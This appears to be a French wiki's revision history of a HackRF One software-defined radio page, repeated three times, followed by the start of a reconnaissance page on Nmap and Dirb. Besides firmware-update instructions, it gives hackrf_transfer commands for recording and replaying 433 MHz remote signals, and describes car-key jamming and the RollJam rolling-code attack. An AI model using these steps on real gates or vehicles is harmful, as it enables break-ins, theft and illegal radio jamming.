Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T15:51:25Z

OldNeib : /* Mise à jour du SPI Flash Firmware */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par .bin.

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T15:49:22Z

OldNeib : /* Mise à jour du micrologiciel */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par ".bin".

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T15:48:47Z

OldNeib : /* HackRF One */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par ".bin".

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus. Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Hacking:Recherche d'information sur cible

2023-12-02T15:47:29Z

OldNeib : /* Burp Suite */

= Nmap =
Nmap est un utilitaire pour l'exploration de réseau et l'audit de sécurité. Il supporte le balayage ping (déterminer quels hôtes sont allumés), de nombreuses techniques de balayage de ports, la détection de version (déterminer les protocoles de services et les versions d'applications qui écoutent derrière ces ports) et les empreintes TCP/IP (identification du système d'exploitation ou du périphérique à distance).

Nmap offre aussi une spécification flexible de cible et de port, le balayage avec diversion ou furtif, le balayage de RPC Sun... La plupart des plate-formes Unix et Windows sont supportées en mode graphique et ligne de commande. Plusieurs périphériques portables populaires sont aussi supportés dont le Sharp Zaurus et le iPAQ.

$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap

$ nmap -h

= Dirb =
DIRB est un scanneur de contenu web. Il recherche les objets Web existants (et/ou cachés). Il fonctionne essentiellement en lançant une attaque basée sur un dictionnaire contre un serveur web et en analysant les réponses.

DIRB est livré avec un ensemble de listes de mots d'attaque préconfigurées pour une utilisation facile, mais vous pouvez utiliser vos propres listes de mots.

